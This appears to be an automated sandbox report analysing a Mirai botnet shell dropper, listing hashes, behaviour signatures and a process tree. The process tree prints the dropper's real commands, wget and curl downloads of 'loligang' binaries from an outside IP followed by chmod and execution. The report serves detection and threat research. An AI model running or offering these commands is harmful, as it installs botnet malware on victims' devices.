Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24-12-2024 02:56
Static task
static1
Behavioral task
behavioral1
Sample
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh
-
Size
1KB
-
MD5
e18ba04d72384ac85e6117c774f6d4f9
-
SHA1
6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
-
SHA256
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
-
SHA512
3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (197895) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1547 chmod 1560 chmod 1595 chmod 1525 chmod 1536 chmod 1573 chmod 1584 chmod 1606 chmod 1617 chmod 1512 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/awoo 1513 awoo /tmp/awoo 1526 awoo /tmp/awoo 1537 awoo /tmp/awoo 1548 awoo /tmp/awoo 1561 awoo /tmp/awoo 1574 awoo /tmp/awoo 1585 awoo /tmp/awoo 1596 awoo /tmp/awoo 1607 awoo /tmp/awoo 1618 awoo -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo -
Enumerates active TCP sockets 1 TTPs 10 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 10 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
description ioc Process File opened for reading /proc/1260/fd awoo File opened for reading /proc/1558/fd awoo File opened for reading /proc/1129/fd awoo File opened for reading /proc/1566/fd awoo File opened for reading /proc/1125/fd awoo File opened for reading /proc/1077/fd awoo File opened for reading /proc/1300/fd awoo File opened for reading /proc/1066/fd awoo File opened for reading /proc/1327/fd awoo File opened for reading /proc/1037/fd awoo File opened for reading /proc/463/fd awoo File opened for reading /proc/1115/fd awoo File opened for reading /proc/1481/fd awoo File opened for reading /proc/1198/fd awoo File opened for reading /proc/484/fd awoo File opened for reading /proc/699/fd awoo File opened for reading /proc/1023/fd awoo File opened for reading /proc/1070/fd awoo File opened for reading /proc/1518/fd awoo File opened for reading /proc/1549/fd awoo File opened for reading /proc/1161/fd awoo File opened for reading /proc/543/fd awoo File opened for reading /proc/961/fd awoo File opened for reading /proc/1260/fd awoo File opened for reading /proc/280/fd awoo File opened for reading /proc/1001/fd awoo File opened for reading /proc/1610/fd awoo File opened for reading /proc/1103/fd awoo File opened for reading /proc/1540/fd awoo File opened for reading /proc/1201/fd awoo File opened for reading /proc/1235/exe awoo File opened for reading /proc/1910/exe awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/1597/fd awoo File opened for reading /proc/1882/exe awoo File opened for reading /proc/2474/exe awoo File opened for reading /proc/1575/fd awoo File opened for reading /proc/1549/fd awoo File opened for reading /proc/1555/fd awoo File opened for reading /proc/1053/exe awoo File opened for reading /proc/2064/exe awoo File opened for reading /proc/599/fd awoo File opened for reading /proc/679/fd awoo File opened for reading /proc/1175/fd awoo File opened for reading /proc/1193/fd awoo File opened for reading /proc/1557/fd awoo File opened for reading /proc/1520/fd awoo File opened for reading /proc/787/fd awoo File opened for reading /proc/444/exe awoo File opened for reading /proc/1001/fd awoo File opened for reading /proc/2087/exe awoo File opened for reading /proc/424/fd awoo File opened for reading /proc/1194/fd awoo File opened for reading /proc/1568/fd awoo File opened for reading /proc/1681/exe awoo File opened for reading /proc/494/fd awoo File opened for reading /proc/1143/fd awoo File opened for reading /proc/610/fd awoo File opened for reading /proc/479/fd awoo File opened for reading /proc/497/fd awoo File opened for reading /proc/1004/fd awoo File opened for reading /proc/2101/exe awoo File opened for reading /proc/2481/exe awoo File opened for reading /proc/1135/fd awoo -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1517 wget 1523 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/awoo 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh File opened for modification /tmp/loligang.mips wget File opened for modification /tmp/loligang.arm5 wget File opened for modification /tmp/loligang.arm5 curl File opened for modification /tmp/loligang.arm6 curl File opened for modification /tmp/loligang.arm7 wget File opened for modification /tmp/loligang.ppc curl File opened for modification /tmp/loligang.m68k curl File opened for modification /tmp/loligang.x86 curl File opened for modification /tmp/loligang.ppc wget File opened for modification /tmp/loligang.sh4 wget File opened for modification /tmp/loligang.arm6 wget File opened for modification /tmp/loligang.arm7 curl File opened for modification /tmp/loligang.sh4 curl File opened for modification /tmp/loligang.x86 wget File opened for modification /tmp/loligang.mips curl File opened for modification /tmp/loligang.mpsl wget File opened for modification /tmp/loligang.mpsl curl File opened for modification /tmp/loligang.arm4 curl File opened for modification /tmp/loligang.m68k wget
Processes
-
/tmp/289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh/tmp/289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh1⤵
- Writes file to tmp directory
PID:1504 -
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:1505
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/catcat loligang.x862⤵PID:1511
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1513
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1517
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1523
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.mips loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1526
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:1530
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.mips loligang.mpsl loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1537
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm42⤵PID:1541
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm42⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.mips loligang.mpsl loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1548
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:1552
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1561
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:1565
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1574
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:1578
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:1589
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1596
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:1600
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
PID:1607
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Writes file to tmp directory
PID:1611
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/chmodchmod +x 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e.sh awoo config-err-VFsj86 loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 netplan_d37cv8st snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-djEs3Z2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1618
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD52354f2531c0bf296738fa7733c42785f
SHA186508e4ee74c70bf226f6666bf227a12be69dcad
SHA2563d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
SHA512eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679